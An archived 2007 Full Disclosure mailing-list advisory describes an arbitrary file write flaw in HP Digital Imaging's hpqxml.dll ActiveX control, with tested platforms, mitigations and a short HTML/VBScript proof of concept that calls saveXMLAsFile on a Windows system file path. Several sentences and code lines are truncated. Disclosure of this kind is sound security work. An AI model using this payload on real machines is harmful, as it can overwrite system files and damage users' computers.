Home page logo

fulldisclosure logo Full Disclosure mailing list archives

[GOODFELLAS - VULN] hpqxml.dll from HP Digital Imaging Arbitary Data Write.
From: "Goodfellas SRT" <goodfellas () shellcode com ar>
Date: Thu, 28 Jun 2007 01:20:21 +0200

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

hpqxml.dll from HP Digital Imaging Arbitary Data Write

Internal ID: VULWAR200706275.


hpqxml.dll is a library included in the HP Photo Digital Imaging
software package from the HP Company. http://www.hp.com.

Tested In

- Windows XP SP2 english/french with IE 6.0 / 7.0.
- Windows vista Professional English/French SP1 with IE 7.0


The saveXMLAsFile method doesn't check if it is being called from the
or from a malicious user.


The vulnerability is due to an error in the saveXMLAsFile method that
local files insecurely, which could allow malicious users to write
data to any file on a vulnerable system. Besides, the method does not
check the 
file headers before writing.


- Activate the Kill bit zero in
- Unregister hpqxml.dll using regsvr32.


June 27, 2007 -- Bug discovery.
June 27, 2007 -- Bug published.


 * Brian Mariani <bmariani () shellcode com ar
 * GoodFellas Security Research Team <goodfellas.shellcode.com.ar>

Technical Detail

saveXMLAsFile method receives a filename as an argument, with this format

Proof of Concept

<title>Hpqxml.dll HP Digital Imaging Arbitary Data Write</title>
<h3>Hpqxml.dll HP Digital Imaging Arbitary Data Write</h3><br>

<object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3' id='target'

<input language=VBScript onclick=HP() type=button value="Proof of

<script language = 'vbscript'>

Sub HP() 

 filename = "C:\NTDETECT_.COM"

 target.saveXMLAsFile filename 

End Sub


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • [GOODFELLAS - VULN] hpqxml.dll from HP Digital Imaging Arbitary Data Write. Goodfellas SRT (Jun 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]